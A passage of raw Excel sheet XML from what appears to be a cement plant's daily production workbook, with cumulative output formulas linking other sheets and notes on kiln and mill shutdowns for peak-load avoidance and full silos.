        <f>'[16]20'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]20'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]20'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]20'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]20'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]20'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'19'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'19'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]20'!$Q$62</f>
        <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：10:00-22:20避峰停机；2#磨：10:00-22:20避峰停机；3#磨：10:00-22:20避峰停机；4#磨：10:00-22:10避峰停机。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G57+'19'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'19'!K57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G58+'19'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'19'!K58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G59+'19'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'19'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]20'!$Q$65</f>
        <v>窑:20:58-24:00错峰停机。A组磨：13:00-24:00避峰停机。D1#磨：11:15-24:00避峰停机，D2#磨：11:15-24:00避峰停机。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G60+'19'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'19'!K60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'[14]20'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]20'!$E$6</f>
        <v>2807</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'19'!H61</f>
        <v>72446</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1188319</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]20'!$E$21</f>
        <v>3969.08</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'19'!K61</f>
        <v>79015.47</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1180175.55</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]20'!$H$6</f>
        <v>31199.6999999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>59.9994230769229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'[14]20'!$M$11+'[14]20'!$M$12+'[14]20'!$M$13+'[14]20'!$M$14+'[14]20'!$M$15+'[14]20'!$M$16+'[14]20'!$M$17+'[14]20'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]20'!$N$11+'[14]20'!$N$12+'[14]20'!$N$13+'[14]20'!$N$14+'[14]20'!$N$15+'[14]20'!$N$16+'[14]20'!$N$17+'[14]20'!$N$18</f>
        <v>871</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'19'!H62</f>
        <v>54873</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>890866.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]20'!$Q$11+'[14]20'!$Q$12+'[14]20'!$Q$13+'[14]20'!$Q$14+'[14]20'!$Q$15+'[14]20'!$Q$16+'[14]20'!$Q$17+'[14]20'!$Q$18</f>
        <v>1866</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'19'!K62</f>
        <v>52119</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>886591.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]20'!$T$11+'[14]20'!$T$12+'[14]20'!$T$13+'[14]20'!$T$14+'[14]20'!$T$15+'[14]20'!$T$16+'[14]20'!$T$17+'[14]20'!$T$18</f>
        <v>21208.634</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>84.8345359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]20'!$Q$71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'[14]20'!$M$19+'[14]20'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]20'!$N$19+'[14]20'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'19'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]20'!$Q$19+'[14]20'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'19'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]20'!$T$19+'[14]20'!$T$20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G64+'19'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'19'!K64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G65+'19'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'19'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]20'!$Q$74</f>
        <v>1#窑:续停；2#窑:8:58窑投料；1#磨:0:00-21:45库满停机。2#磨:0:00-19:55库满停机。3#磨:0:00-24:00库满停机。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G66+'19'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'19'!K66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G67+'19'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'19'!K67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'[15]20'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]20'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'19'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]20'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'19'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]20'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]20'!$Q$77</f>
        <v>1#磨8:00-22:15避峰停机:14.25小时(避峰)。2#磨8:00-22:15避峰停机:14.25小时(避峰)。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]20'!$D$43+'[15]20'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]20'!$E$43+'[15]20'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'19'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]20'!$H$43+'[15]20'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'19'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]20'!$K$43+'[15]20'!$K$44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'[15]20'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]20'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'19'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]20'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'19'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]20'!$K$45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G71+'19'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'19'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]20'!$Q$80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G72+'19'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'19'!K72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G73+'19'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'19'!K73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G74+'19'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'19'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]20'!$Q$83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G75+'19'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'19'!K75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G76+'19'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'19'!K76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G77+'19'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'19'!K77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G78+'19'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'19'!K78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'[16]20'!$E$7</f>
        <v>520.04</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'19'!H79</f>
        <v>10116.64</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>157245.11</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]20'!$I$7</f>
        <v>419.5</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'19'!K79</f>
        <v>10019</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>151910.45</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]20'!$L$7</f>
        <v>4982.42</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>9.96484</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'[16]20'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'19'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]20'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'19'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]20'!$Y$15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G81+'19'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'19'!K81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G82+'19'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'19'!K82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G83+'19'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'19'!K83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G84+'19'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'19'!K84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G85+'19'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'19'!K85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Z158"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="4" ySplit="4" topLeftCell="H32" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="AA42" sqref="AA42"/>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21/31</f>
        <v>0.67741935483871</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>46012</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21364.94</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'20'!H5</f>
        <v>434945.39</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6589811.42</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>21900.18</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'20'!K5</f>
        <v>483226.589</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6633297.72</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>219186.625</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>58.6060494652406</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]21'!$W$101</f>
        <v>0</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]21'!$X$101</f>
        <v>271.294167565063</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]21'!$Y$101</f>
        <v>260.421411059556</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]21'!$T$101</f>
        <v>0</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]21'!$U$101</f>
        <v>45.8267857142857</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]21'!$V$101</f>
        <v>63.5479577464789</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]21'!$Q$101</f>
        <v>0</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]21'!$R$101</f>
        <v>230.967</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]21'!$S$101</f>
        <v>5414.286</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]21'!$D$23+'[11]21'!$D$17+'[12]21'!$D$17+'[13]21'!$D$25+'[14]21'!$D$8+'[14]21'!$D$15+'[15]21'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]21'!$E$23+'[11]21'!$E$17+'[12]21'!$E$17+'[13]21'!$E$25+'[14]21'!$E$8+'[14]21'!$E$15+'[15]21'!$E$7</f>
        <v>0</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'20'!H6</f>
        <v>5428</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>281777.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]21'!$I$23+'[11]21'!$I$17+'[12]21'!$I$17+'[13]21'!$I$25+'[14]21'!$E$23+'[14]21'!$E$30+'[15]21'!$H$7</f>
        <v>663.72</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'20'!K6</f>
        <v>15051.91</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>277249.61</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]21'!$L$23+'[11]21'!$L$17+'[12]21'!$L$17+'[13]21'!$L$25+'[14]21'!$H$23+'[14]21'!$H$30+'[15]21'!$K$7</f>
        <v>22488.93</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]21'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]21'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]21'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]21'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]21'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]21'!$V$102</f>
        <v>33.3943544600939</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]21'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]21'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]21'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]21'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]21'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'20'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]21'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'20'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]21'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]21'!$W$107</f>
        <v>133.474218089603</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]21'!$X$107</f>
        <v>127.061301693749</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]21'!$Y$107</f>
        <v>131.514504884016</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]21'!$T$107</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]21'!$U$107</f>
        <v>46.1547619047619</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]21'!$V$107</f>
        <v>31.9019953051643</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]21'!$Q$107</f>
        <v>11.83</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]21'!$R$107</f>
        <v>232.62</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]21'!$S$107</f>
        <v>2718.05</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]21'!$D$27+'[11]21'!$D$18+'[13]21'!$D$26+'[14]21'!$D$10+'[14]21'!$D$17+'[15]21'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]21'!$E$27+'[11]21'!$E$18+'[13]21'!$E$26+'[14]21'!$E$10+'[14]21'!$E$17+'[15]21'!$E$9</f>
        <v>685</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'20'!H8</f>
        <v>43131</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>568667.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]21'!$I$27+'[11]21'!$I$18+'[13]21'!$I$26+'[14]21'!$E$25+'[14]21'!$E$32+'[15]21'!$H$9</f>
        <v>3054.26</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'20'!K8</f>
        <v>53361.24</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>561105.95</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]21'!$L$27+'[11]21'!$L$18+'[13]21'!$L$26+'[14]21'!$H$25+'[14]21'!$H$32+'[15]21'!$K$9</f>
        <v>31649.66</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]21'!$W$108</f>
        <v>130.684699915469</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]21'!$X$108</f>
        <v>132.591529073941</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]21'!$Y$108</f>
        <v>127.927072803925</v>
      </c>
      <c r="U8" s="198">
        <f>'[10]21'!$T$108</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]21'!$U$108</f>
        <v>46.9861111111111</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]21'!$V$108</f>
        <v>28.5640845070422</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]21'!$Q$108</f>
        <v>11.83</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]21'!$R$108</f>
        <v>236.81</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]21'!$S$108</f>
        <v>2433.66</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]21'!$D$24+'[11]21'!$D$19+'[12]21'!$D$20+'[13]21'!$D$27+'[14]21'!$D$11+'[14]21'!$D$18+'[15]21'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>'[10]21'!$E$24+'[11]21'!$E$19+'[12]21'!$E$20+'[13]21'!$E$27+'[14]21'!$E$11+'[14]21'!$E$18+'[15]21'!$E$10</f>
        <v>11503</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'20'!H9</f>
        <v>307603</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4442991.88</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]21'!$I$24+'[11]21'!$I$19+'[12]21'!$I$20+'[13]21'!$I$27+'[14]21'!$E$26+'[14]21'!$E$33+'[15]21'!$H$10</f>
        <v>13594.67</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'20'!K9</f>
        <v>325517.829</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4422996.64</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]21'!$L$24+'[11]21'!$L$19+'[12]21'!$L$20+'[13]21'!$L$27+'[14]21'!$H$26+'[14]21'!$H$33+'[15]21'!$K$10</f>
        <v>92950.883</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]21'!$W$109</f>
        <v>208.869565217391</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]21'!$X$109</f>
        <v>266.591080876795</v>
      </c>
      <c r="T9" s="198">
        <f>'[10]21'!$Y$109</f>
        <v>271.039365408852</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]21'!$T$109</f>
        <v>47.9166666666667</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]21'!$U$109</f>
        <v>34.125</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]21'!$V$109</f>
        <v>34.8307511737089</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]21'!$Q$109</f>
        <v>11.5</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]21'!$R$109</f>
        <v>171.99</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]21'!$S$109</f>
        <v>2967.57999999999</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]21'!$D$25+'[11]21'!$D$20+'[12]21'!$D$21+'[13]21'!$D$28+'[14]21'!$D$12+'[14]21'!$D$19+'[15]21'!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>'[10]21'!$E$25+'[11]21'!$E$20+'[12]21'!$E$21+'[13]21'!$E$28+'[14]21'!$E$12+'[14]21'!$E$19+'[15]21'!$E$11</f>
        <v>6029</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'20'!H10</f>
        <v>51857</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>969384.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]21'!$I$25+'[11]21'!$I$20+'[12]21'!$I$21+'[13]21'!$I$28+'[14]21'!$E$27+'[14]21'!$E$34+'[15]21'!$H$11</f>
        <v>2711.64</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'20'!K10</f>
        <v>60352.92</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>957581.64</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]21'!$L$25+'[11]21'!$L$20+'[12]21'!$L$21+'[13]21'!$L$28+'[14]21'!$H$27+'[14]21'!$H$34+'[15]21'!$K$11</f>
        <v>52711.022</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
